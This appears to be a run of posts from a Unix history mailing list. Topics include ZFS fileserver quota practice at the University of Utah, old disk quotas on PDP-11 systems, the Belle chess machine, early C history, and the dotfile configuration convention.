For the last 15+ years, our central fileservers have run ZFS on
Solaris 10 (SPARC, then on Intel x86_64), and for the last 17 months,
on GNU/Linux CentOS 7.
Each ZFS dataset gets its space from a large shared pool of disks, and
each dataset has a quota: thus, space CAN fill up in a given dataset,
so that some users might experience a disk-full situation. In
practice, that rarely happens, because a cron job runs every 20
minutes, looking for datasets that are nearly full, and giving them a
few extra GB if needed. Affected users in a average of 10 minutes or
so will no longer see disk-full problems. If we see serious imbalance
in the sizes of previously similar-sized datasets, we manually move
directory trees between datasets to achieve a reasonable balance, and
reset the dataset quotas.
We make nightly ZFS snapshots (hourly for user home directories), and
send the nightlies to an off-campus server in a large datacenter, and
we write nightly filesystem backs to a tape robot. The tape technology
generations have evolved through 9-track, QIC, 4mm DAT, 8mm DAT, DLT,
LTO-4, LTO-6, and perhaps soon, LTO-8.
Our main fileserver talks through a live SAN FibreChannel mirror to
independent storage arrays in two different buildings.
Thus, we always have two live copies of all data, and third far-away
live copy that is no more than 24 hours old.
Yes, we do see runaway output files from time to time, and an
occasional student (among currently more than 17,000 accounts) who
uses an unreasonable amount of space. In such cases, we deal with the
job, or user, involved, and get space freed up; other users remain
largely remain unaware of the temporary space crisis.
The result of our no-quotas policy is that few of our users have ever
seen a disk-full condition; they just get on with their work, as they,
and we, expect them to do.
-------------------------------------------------------------------------------
- Nelson H. F. Beebe Tel: +1 801 581 5254 -
- University of Utah FAX: +1 801 581 4148 -
- Department of Mathematics, 110 LCB Internet e-mail: beebe(a)math.utah.edu -
- 155 S 1400 E RM 233 beebe(a)acm.org beebe(a)computer.org -
- Salt Lake City, UT 84112-0090, USA URL: http://www.math.utah.edu/~beebe/ -
-------------------------------------------------------------------------------
i used the fair share schedular whilst a sysadmin of a small cray at UNSW. being an expensive machine the various departments who paid for it wanted, well, their fair share.
in a different job i had a cron job that restricted Sybase backend engines to a subset of the cpus on an big SGI box during peak hours, at night sybase had free reign of all cpus.
anyone did anything similar?
-Steve
> From: KatolaZ
> I remember a 5MB quota at uni when I was an undergrad, and I definitely
> remember when it was increased to 10MB :)
Light your cigar with disk blocks!
When I was in high school, I had an account on the school's computer, a
PDP-11/20 running RSTS, with a single RF11 disk (well, technically, an RS11
drive on an RF11 controller). For those whose jaw didn't bounce off the floor,
reading that, the RS11 was a fixed-head disk with a total capacity of 512KB
(1024 512-byte blocks).
IIRC, my disk quota was 5 blocks. :-)
Noel
----- Forwarded message from meljmel-unix(a)yahoo.com -----
Warren,
Thanks for your help. To my amazement in one day I received
8 requests for the documents you posted on the TUHS mailing
list for me. If you think it's appropriate you can post that
everything has been claimed. I will be mailing the Unix TMs
and other papers to Robert Swierczek <rmswierczek(a)gmail.com>
who said he will scan any one-of-a-kind items and make them
available to you and TUHS. The manuals/books will be going
to someone else who very much wanted them.
Mel
----- End forwarded message -----
> That photo is not Belle, or at least not the Belle machine that the article
is about.
The photo shows the piece-sensing (by tuned resonant circuits)
chess board that Joe Condon built before he and Ken built the
harware version of Belle that reigned as world computer chess
champion for several years beginning in 1980 and became the
first machine to earn a master rating.
Doug
> From: "John P. Linderman"
> Brian interviewing Ken
Ah, thanks for that. I had intended going (since I've never met Ken), but
alas, my daughter's family had previously scheduled to visit that weekend, so
I couldn't go.
The 'grep' story was amusing, but historically, probably the most valuable
thing was the detail on the origins of B - DMR's paper on early C ("The
Development of the C Language") mentions the FORTRAN, but doesn't give the
detail on why that got canned, and B appeared instead.
Noel
Decades ago there was an interpreted C in an X10 or X11 app, I believe it
came from the UK. And maybe it wasn't X11, maybe it was Sunview?
Whatever it was the author didn't like the bundled scrollbars and had
their own custom made one.
You could set breakpoints like a debugger and then go look around at state.
Does anyone else remember that app and what it was called?
Bakul Shah:
This could've been avoided if there was a convention about
where to store per user per app settings & possibly state. On
one of my Unix machines I have over 200 dotfiles.
====
Some, I think including Ken and Dennis, might have argued
that real UNIX programs aren't complex enough to need
lots of configuration files.
Agree with it or not, that likely explains why the Research
stream never supplied a better convention about where to
store such files. I do remember some general debate in the
community (e.g. on netnews) about the matter back in the
early 1980s. One suggestion I recall was to move all the
files to subdirectory `$HOME/...'. Personally I think
$HOME/conf would have been better (though I lean toward
the view that very few programs should need such files
anyway).
But by then BSD had spread the convention of leaving
`hidden' files in $HOME had spread too far to call
back. It wouldn't surprise me if some at Berkeley
would rather have moved to a cleaner convention, just
as the silly uucp-baud-rate flags were removed from
wc, but the cat was already out of the bag and too
hard to stuff back in.
On the Ubuntu Linux systems I help run these days, there
is a directory $HOME/.config. The tree within has 192
directories and 187 regular files. I have no idea what
all those files are for, but from the names, most are
from programs I may have run once years ago to test
something, or from programs I run occasionally but
have no context I care about saving. The whole tree
occupies almost six megabytes, which seems small
by current standards, but (as those on this list
certainly know) in the early 1980s it was possible
to run a complete multi-user UNIX system comfortably
from a single 2.5MB RK05 disk.
Norman Wilson
Toronto ON
Dennis's `The UNIX I/O System' paper in Volume 2 of the 7/e
manual is basically about how drivers work. Is that near
enough, possibly as augmented by Ken's `UNIX Implementation'
paper in the same book?
Those were my own starting point, long ago, for understanding
how to write device drivers. Along with existing source code
as examples, of course, but (unlikely many who hack on device
drivers, I'm afraid) I have always preferred to have a proper
statement of rules, conventions, and interfaces rather than
just reading code and guessing.
Norman Wilson
Toronto ON